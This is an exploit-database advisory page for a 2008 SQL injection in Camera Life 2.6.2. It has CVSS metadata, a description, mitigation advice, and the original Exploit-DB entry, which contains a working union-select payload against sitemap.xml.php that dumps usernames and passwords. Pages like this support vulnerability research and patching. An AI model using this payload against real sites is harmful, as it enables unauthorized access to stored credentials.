header-logo
Suggest Exploit
vendor:
Camera Life
by:
nuclear
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Camera Life
Affected Version From: 2.6.2002
Affected Version To: 2.6.2002
Patch Exists: YES
Related CWE: N/A
CPE: a:fdcl:cameralife:2.6.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2008

Camera Life 2.6.2(id) Sql Injection Vulnerability

Camera Life 2.6.2 is vulnerable to a SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The request contains malicious SQL statements that are executed in the backend database. This can allow an attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

#Camera Life 2.6.2(id) Sql Injection Vulnerability



#Author: nuclear



#script: http://downloads.sourceforge.net/fdcl/cameralife-2.6.2aa.zip



#exploit: sitemap.xml.php?page=photos&id=999999 union select concat(username,0x3a,password),null from users --



#greetz cAs, Mi4night, zYzTeM ,THE_MAN, DiGitalX, sys32r, sys32-hack, Digitalfortress, and me :P

# milw0rm.com [2008-07-25]

Navigation

Suggest Exploit

Services By CQR